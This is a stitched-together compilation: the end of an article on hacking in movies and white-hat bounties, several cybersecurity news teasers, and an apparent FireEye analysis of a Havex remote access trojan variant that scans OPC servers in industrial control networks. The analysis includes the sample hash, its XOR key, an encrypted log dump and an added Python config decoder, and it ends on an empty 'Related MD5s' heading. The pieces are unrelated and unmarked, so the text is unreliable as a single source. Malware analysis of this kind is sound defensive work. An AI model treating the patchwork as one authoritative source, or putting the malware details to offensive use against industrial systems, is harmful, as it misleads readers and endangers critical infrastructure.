One thing movies get right sometimes is that hackers can be the good guys. There is a whole category of ethical hackers who often work as bounty hunters to find flaws in a company's cybersecurity systems. These so-called “white hat” hackers attempt to break in and are paid a bounty if they can reveal security deficiencies.

Sometimes, white-hat hacking comes with a significant paycheck. The bounty platform HackerOne has paid out $40 million across 2020 alone, making seven different hackers millionaires in a single year.

With the desperate need for individuals in the cybersecurity field, the truth around hacking is important to note. While Hollywood can make hacking seem glamorous and exciting, the truth is that many hacking processes come with dangerous implications. However, hacking can also be used to benefit the safety of information in ethical bounty situations.

With the emergence of cloud computing as a standard for remote workspaces, security professionals are needed now more than ever. Secure public and private cloud solutions are required for a functioning application marketplace, and cybersecurity professionals play a key role in maintaining that safety.

While cybersecurity isn’t always exciting, the results of keeping systems safe are much more rewarding than the black-hat alternatives.

The movie industry propagates a view of the cybersecurity field that is often far from reality. However, by acknowledging the departures from the truth, we get a better idea of the need and value of cybersecurity solutions as a whole, especially in the modern world of accelerated digital innovation.

While hacking and cybersecurity might not be anywhere near as exciting as they are in movies, working in cybersecurity—whether as a systems expert or a white-hat hacker—can mean a big paycheck and a safer world for the people you know and love. And that reality is better than any movie.

iPhones vulnerable to hacking tool for months, researchers say

Analysis: NSO Group’s Pegasus spyware could allegedly track locations and access passwords

For almost a year, spyware sold by Israel’s NSO Group was allegedly armed with a computer security super-weapon: a zero-footprint, zero-click, zero-day exploit that used a vulnerability in iMessage to seize control of an iPhone at the push of a button.

That means it would have left no visible trace of being placed on target’s phones, could be installed by simply sending a message that the victim didn’t even need to click on, and worked even on phones that were running the then-latest version of iOS, the operating system for iPhones.


Twitter hires veteran hacker Mudge as head of security

Peiter Zatko’s appointment follows mass attack on social media platform in July

Twitter has appointed one of the world’s most respected hackers as its new head of security in the wake of a humiliating mass attack in July.

The company has placed Peiter Zatko in charge of protecting its platform from threats of all varieties, poaching him from the payments startup Stripe. Zatko is better known as Mudge, his handle for more than 20 years of operation on both sides of the information security arena.


BA fined record £20m for customer data breach

Personal details of more than 400,000 customers accessed by hackers in 2018

A £183m fine levied on British Airways for a data breach has been reduced to £20m after investigators took into account the airline’s financial plight and the circumstances of the cyber-attack.

The £20m fine is nonetheless the biggest ever issued by the Information Commissioner’s Office (ICO), following the 2018 incident in which more than 400,000 customers’ personal details were compromised by hackers.


EasyJet reveals cyber-attack exposed 9m customers’ details

Airline apologises after credit card details of about 2,200 passengers were stolen

EasyJet has revealed that the personal information of 9 million customers was accessed in a “highly sophisticated” cyber-attack on the airline.

The company said on Tuesday that email addresses and travel details were accessed and it would contact the customers affected.


The Myth of “Staying One Step Ahead of the Hackers”


The assumption that software security can stay ahead of the hackers is not true because the software security industry is always reacting to threats that hackers expose. Once hackers start exploiting a flaw in an application, security companies try to block the resulting threat by providing security updates for existing software or by developing new programs. Either way, hackers will be one step ahead because the software security industry can’t predict what new threats the hackers will unleash.

Havex, It’s Down With OPC

FireEye recently analyzed the capabilities of a variant of Havex (referred to by FireEye as “Fertger” or “PEACEPIPE”), the first publicized malware reported to actively scan OPC servers used for controlling SCADA (Supervisory Control and Data Acquisition) devices in critical infrastructure (e.g., water and electric utilities), energy, and manufacturing sectors.

While Havex itself is a somewhat simple PHP Remote Access Trojan (RAT) that has been analyzed by other sources, none of these have covered the scanning functionality that could impact SCADA devices and other industrial control systems (ICS). Specifically, this Havex variant targets servers involved in OPC (Object linking and embedding for Process Control) communication, a client/server technology widely used in process control systems (for example, to control water pumps, turbines, tanks, etc.).

Note: ICS is a general term that encompasses SCADA (Supervisory Control and Data Acquisition) systems, DCS (Distributed Control Systems), and other control system environments. The term SCADA is well-known to wider audiences, and throughout this article, ICS and SCADA will be used interchangeably.

Threat actors have leveraged Havex in attacks across the energy sector for over a year, but the full extent of industries and ICS systems affected by Havex is unknown. We decided to examine the OPC scanning component of Havex more closely, to better understand what happens when it’s executed and the possible implications.

OPC Testing Environment

To conduct a true test of the Havex variant’s functionality, we constructed an OPC server test environment that fully replicates a typical OPC server setup (Figure 1 [3]). As shown, ICS or SCADA systems involve OPC client software that interacts directly with an OPC server, which works in tandem with the PLC (Programmable Logic Controller) to control industrial hardware (such as a water pump, turbine, or tank). FireEye replicated both the hardware and the software of the OPC server setup (the components that appear within the dashed line on the right side of Figure 1).

Figure 1: Topology of typical OPC server setup

The components of our test environment are robust and comprehensive to the point that our system could be deployed in an environment to control actual SCADA devices. We utilized an Arduino Uno [1] as the primary hardware platform, acting as the OPC server. The Arduino Uno is an ideal platform for developing an ICS test environment because of its low power requirements, the large number of libraries that make programming the microcontroller easier, serial communication over USB, and low cost. We leveraged the OPC Server and libraries from St4makers [2] (as shown in Figure 2). This software is available for free to SCADA engineers to allow them to develop software to communicate information to and from SCADA devices.


Figure 2: OPC Server Setup

Using the OPC Server libraries allowed us to make the Arduino Uno act as a true, functioning OPC SCADA device (Figure 3).


Figure 3: Matrikon OPC Explorer showing Arduino OPC Server

We also used Matrikon’s OPC Explorer [1], which enables browsing between the Arduino OPC server and the Matrikon embedded simulation OPC server. In addition, the Explorer can be used to add certain data points to the SCADA device – in this case, the Arduino device.


Figure 4: Tags identified for OPC server

In the OPC testing environment, we created tags in order to simulate a functioning OPC server. Tags, in relation to ICS devices, are single data points, for example temperature, vibration, or fill level. A tag represents a single value monitored or controlled by the system at a single point in time.

With our test environment complete, we executed the malicious Havex “.dll” file and analyzed how Havex’s OPC scanning module might affect OPC servers it comes in contact with.


The particular Havex sample we looked at was a file named PE.dll (6bfc42f7cb1364ef0bfd749776ac6d38). When looking into the scanning functionality of the particular Havex sample, it directly scans for OPC servers, both on the server the sample was submitted on, and laterally, across the entire network.

The scanning process starts when the Havex downloader calls the runDll export function. The OPC scanner module identifies potential OPC servers by using the Windows networking (WNet) functions. Through recursive calls to WNetOpenEnum and WNetEnumResources, the scanner builds a list of all servers that are globally accessible through Windows networking. The list of servers is then checked to determine whether any of them host an interface to the Component Object Model (COM) objects listed below:

Figure 5: Relevant COM objects

Once OPC servers are identified, the following CLSIDs are used to determine the capabilities of the OPC server:

Figure 6: CLSIDs used to determine capabilities of the OPC server

When executing PE.dll, all of the OPC server data output is first saved as %TEMP%\[random].tmp.dat. The results of a capability scan of an OPC server are stored in %TEMP%\OPCServer[random].txt. Files are not encrypted or deleted once the scanning process is complete.

Once the scanning completes, the log is deleted and the contents are encrypted and stored into a file named %TEMP%\[random].tmp.yls. The encryption process uses an RSA public key obtained from the PE resource TYU. The RSA key is used to protect a randomly generated 168-bit 3DES key that is used to encrypt the contents of the log.

The TYU resource is BZip2 compressed and XORed with the string “1312312”. A decoded configuration for 6BFC42F7CB1364EF0BFD749776AC6D38 is included in the figure below:

Figure 7: Sample decoded TYU resource

The 4409de445240923e05c5fa6fb4204 value is believed to be an RSA key identifier. The AASp1… value is the Base64 encoded RSA key.
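A decoder for the TYU resource as described above, added here as an example rather than FireEye’s own tooling: it assumes the XOR with “1312312” is applied to the BZip2 stream (so decoding XORs first and then decompresses), checks the BZip2 magic to confirm that layering and falls back to the opposite one, and uses a constructed stand-in for the configuration text.

```python
"""Decode a Havex-style TYU configuration resource (XOR + BZip2).

Added example, not FireEye's code. The write-up states the resource is
BZip2 compressed and XORed with the string "1312312"; this code assumes
the XOR is applied to the compressed stream (so decoding XORs first and
decompresses second) and falls back to the opposite layering when the
BZip2 magic is not found. The sample configuration below is constructed.
"""
import bz2
from itertools import cycle

XOR_KEY = b"1312312"   # key string quoted in the write-up
BZ2_MAGIC = b"BZh"     # every BZip2 stream starts with this signature


def xor_bytes(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """XOR data against a repeating key; the operation is its own inverse."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def encode_tyu(plaintext: bytes, xor_first: bool = False) -> bytes:
    """Build a resource blob under either layering (used here to construct input)."""
    if xor_first:
        return bz2.compress(xor_bytes(plaintext))
    return xor_bytes(bz2.compress(plaintext))


def decode_tyu(blob: bytes) -> bytes:
    """Recover the plaintext configuration, detecting which layer is outermost."""
    unxored = xor_bytes(blob)
    if unxored.startswith(BZ2_MAGIC):      # expected case: XOR outside, BZip2 inside
        return bz2.decompress(unxored)
    if blob.startswith(BZ2_MAGIC):         # fallback: BZip2 outside, XOR inside
        return xor_bytes(bz2.decompress(blob))
    raise ValueError("no BZip2 stream found under either layering")


# Constructed stand-in for a decoded configuration; the real layout is only
# known from the screenshot in the write-up, so no field names are assumed.
SAMPLE_CONFIG = (
    b"[constructed sample]\n"
    b"keyid=<placeholder key identifier>\n"
    b"rsakey=<placeholder base64 RSA public key>\n"
)

if __name__ == "__main__":
    blob = encode_tyu(SAMPLE_CONFIG)
    print(decode_tyu(blob).decode())
```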

A sample encrypted log file (%TEMP%\[random].tmp.yls) is below.

00000000  32 39 0a 66 00 66 00 30  00 30 00 66 00 66 00 30  29.f.f.0.0.f.f.0
00000010  00 30 00 66 00 66 00 30  00 30 00 66 00 66 00 30  .0.f.f.0.0.f.f.0
00000020  00 30 00 66 00 66 00 30  00 30 00 66 00 66 00 30  .0.f.f.0.0.f.f.0
00000030  00 30 00 66 00 66 00 30  00 30 00 66 00 37 39 36  .0.f.f.0.0.f.796
00000040  0a 31 32 38 0a 96 26 cc  34 93 a5 4a 09 09 17 d3  .128..&.4..J....
00000050  e0 bb 15 90 e8 5d cb 01  c0 33 c1 a4 41 72 5f a5  .....]...3..Ar_.
00000060  13 43 69 62 cf a3 80 e3  6f ce 2f 95 d1 38 0f f2  .Cib....o./..8..
00000070  56 b1 f9 5e 1d e1 43 92  61 f8 60 1d 06 04 ad f9  V..^..C.a.`.....
00000080  66 98 1f eb e9 4c d3 cb  ee 4a 39 75 31 54 b8 02  f....L...J9u1T..
00000090  b5 b6 4a 3c e3 77 26 6d  93 b9 66 45 4a 44 f7 a2  ..J<.w&m..fEJD..
000000A0  08 6a 22 89 b7 d3 72 d4  1f 8d b6 80 2b d2 99 5d  .j"...r.....+..]
000000B0  61 87 c1 0c 47 27 6a 61  fc c5 ee 41 a5 ae 89 c3  a...G'ja...A....
000000C0  9e 00 54 b9 46 b8 88 72  94 a3 95 c8 8e 5d fe 23  ..T.F..r.....].#
000000D0  2d fb 48 85 d5 31 c7 65  f1 c4 47 75 6f 77 03 6b  -.H..1.e..Guow.k

--Truncated--

Probable Key Identifier: ff00ff00ff00ff00ff00ff00ff00f
RSA Encrypted 3DES Key: 5A EB 13 80 FE A6 B9 A9 8A 0F 41… (the 3DES key will be the last 24 bytes of the decrypted result)
3DES IV: 88 72 94 a3 95 c8 8e 5d
3DES Encrypted Log: fe 23 2d fb 48 85 d5 31 c7 65 f1…

Figure 8: Sample encrypted .yls file


When executing PE.dll against the Arduino OPC server, we observe interesting responses within the plaintext %TEMP%\[random].tmp.dat:

Figure 9: Sample scan log

The contents of the tmp.dat file are the results of the scan of the network devices, looking for OPC servers. These are only the results of the initial discovery scan, not the in-depth interrogation of the OPC servers themselves.

The particular Havex sample in question also enumerates OPC tags and fully interrogates the OPC servers identified within %TEMP%\[random].tmp.dat. The particular fields queried are: server state, tag name, type, access, and id. The contents of a sample %TEMP%\OPCServer[random].txt can be found below:

Figure 10: Contents of OPCServer[Random].txt OPC interrogation

While we don’t have a particular case study to prove the attacker’s next steps, it is likely after these files are created and saved, they will be exfiltrated to a command and control server for further processing.


Part of threat intelligence requires understanding all parts of a particular threat. This is why we took a closer look at the OPC functionality of this particular Havex variant.  We don’t have any case study showcasing why the OPC modules were included, and this is the first “in the wild” sample using OPC scanning. It is possible that these attackers could have used this malware as a testing ground for future utilization, however.

Since ICS networks typically don’t have a high level of visibility into the environment, there are several ways to help minimize some of the risks associated with a threat like Havex. First, ICS environments need the ability to perform full packet capture. This gives incident responders and engineers better visibility should an incident occur.

Also, having mature incident processes for your ICS environment is important. Being able to have security engineers that also understand ICS environments during an incident is paramount. Finally, having trained professionals consistently perform security checks on ICS environments is helpful. This ensures standard sets of security protocols and best practices are followed within a highly secure environment.

We hope that this information will further educate industrial control systems owners and the security community about how the OPC functionality of this threat works and serves as the foundation for more investigation. Still, lots of questions remain about this component of Havex. What is the attack path? Who is behind it? What is their intention? We’re continuing to track this specific threat and will provide further updates as this new tactic unfolds.


We would like to thank Josh Homan for his help and support.

Related MD5s